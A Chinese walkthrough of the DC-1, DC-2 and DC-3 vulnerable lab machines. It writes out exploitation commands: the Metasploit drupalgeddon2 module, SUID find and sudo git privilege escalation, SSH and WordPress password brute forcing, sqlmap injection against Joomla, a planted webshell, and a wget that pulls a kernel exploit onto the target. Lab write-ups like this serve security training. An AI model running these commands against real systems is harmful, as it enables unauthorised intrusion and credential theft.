DC-1靶機

埠加內網主機探測，發現192.168.114.146這臺主機，並且開放了有22，80，111以及48683這幾個埠。

發現是Drupal框架。

進行目錄的掃描：

發現admin被禁止訪問，以及robots.txt並進行訪問，發現都是許可權不足，檢視一下漏洞。

看到一個遠端命令執行漏洞，並且metasploit裡面是能直接用的。

得到shell，這裡使用到的模組是exploit/unix/webapp/drupal_drupalgeddon2 。

ls看到第一個flag。

繼續切換到home目錄發現flag4使用者得到flag4，嘗試讀取flag4的密碼，沒有許可權，嘗試提權。

沒有發現可利用的定時計劃。

繼續檢視具有suid的程式嘗試進行提權：

發現find命了，在主目錄下沒辦法建檔案，但是切換到tmp目錄下，穿件檔案

`touch test`  


www-data@DC-1:/tmp$ /usr/bin/find test -exec whoami \;
/usr/bin/find test -exec whoami \;
root

提權成功為root。

此時已經是root了，那麼久不管剩下的flag了，這個靶機還是很簡單的。

這道題還有一個麻煩的思路，那就是密碼爆破了

Medusa -M ssh –h 192.168.114.146 –u flag4 -P /usr/share/john/password.lst -e ns -F 
 

利用他的ssh服務，使用medusa進行爆破。

密碼為orange。

提權也是一樣的套路。

DC-2靶機

埠加內網主機探測，發現主機192.168.114.147,開放了80埠以及7744埠。

但是直接訪問是沒有辦法訪問的，跳轉到dc-2就沒有相應了，需要修改一下host檔案。

又是一個wordpress網站，掃目錄沒發現有價值的，wpscan掃一下，發現三個使用者，沒有外掛，主題是twentyseventeen，未發現版本漏洞，檢視站點，發現flag，檢視告訴我們要進行爆破，並且工具推薦我們利用cewl，可能站點有資訊能被利用到吧。

root@kali:~# wpscan --url http://dc-2/ -U dc4-user.txt -P dc-4.txt

登陸成功，使用者為tom。

利用vim獲取shell，告訴我們要切換使用者，於是切換使用者，密碼之前已經爆出來了。

得到flag4。

find命令找一下，用git命令使用SUID提權到root。

成功提權

sudo git -p help config 
/bin/bash

接著可以利用python創造一個虛擬終端。

DC-3靶機

埠發現只開放了80埠，訪問利用dirb進行目錄爆破，發現很多，先到後臺確認一下，http://192.168.114.148/administrator/

whatweb確認一下版本，只探測到了cms是joomla。

百度了一下，看到工具joomscan，kali裡面直接get一下就行，安裝完成，探測到版本號是3.7.0.檢視有沒有相關漏洞。

發現有很多漏洞，有一個sql注入漏洞。

告訴我們利用sqlmap即可即

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]   

發現五個資料庫，繼續爆表，joomladb應該能幫助我們找到管理員密碼。

root@kali:~# sqlmap -u "http://192.168.114.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables  -p list[fullordering]  

有76個表。

發現表名：__bsms_books ，以及__users

爆列名：

root@kali:~# sqlmap -u "http://192.168.114.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns  -p list[fullordering] 

發現admin使用者以及他加密後的密碼，準備進行暴力破解，密碼為snoopy。

登陸後端，看看有沒有能夠反彈shell，寫木馬的地方，重新命名一個檔案，寫上一句話木馬，蟻劍連一下，進入虛擬終端。

一些較常規的方法沒有思路，看一下有沒有系統的漏洞。

注意我們找到了這個漏洞，但是利用原始碼的地址是發生了變化，分目錄是tree而不是raw了。
命令：

wget https://github.com/offensive-security/exploitdb-bin-sploits/blob/master/bin-sploits/39772.zip  

這個掛了，找不到原始碼包了，總之就是在目標機器上下載這個檔案，然後在目標機器上解壓exploit.tar， 最後就是兩條指令：bash compile.sh，./doubleput